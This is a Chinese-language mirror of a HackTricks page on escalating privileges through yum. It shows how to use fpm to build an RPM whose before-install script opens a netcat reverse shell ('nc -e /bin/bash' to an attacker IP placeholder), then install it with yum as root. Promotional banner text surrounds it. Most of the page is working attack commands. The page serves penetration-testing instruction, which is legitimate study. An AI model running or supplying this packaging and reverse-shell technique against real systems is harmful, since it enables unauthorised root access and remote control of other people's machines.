mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-03 09:59:40 +00:00
2.5 KiB
2.5 KiB
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
在gtfobins上还可以找到有关yum的更多示例。
通过RPM软件包执行任意命令
检查环境
为了利用这个向量,用户必须能够以更高权限的用户(即root)身份执行yum命令。
这个向量的一个工作示例
这个漏洞的一个工作示例可以在tryhackme的daily bugle房间中找到。
打包一个RPM
在接下来的部分中,我将介绍如何使用fpm将一个反向shell打包到一个RPM中。
下面的示例创建了一个包,其中包含一个带有任意脚本的before-install触发器,攻击者可以自行定义。安装时,此软件包将执行任意命令。我使用了一个简单的反向netcat shell示例进行演示,但可以根据需要进行更改。
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
获取shell
使用上述示例,假设yum
可以作为一个具有更高权限的用户执行。
- 传输rpm到主机
- 在本地主机上启动监听器,例如示例netcat监听器
- 安装受影响的软件包
yum localinstall -y exploited-1.0-1.noarch.rpm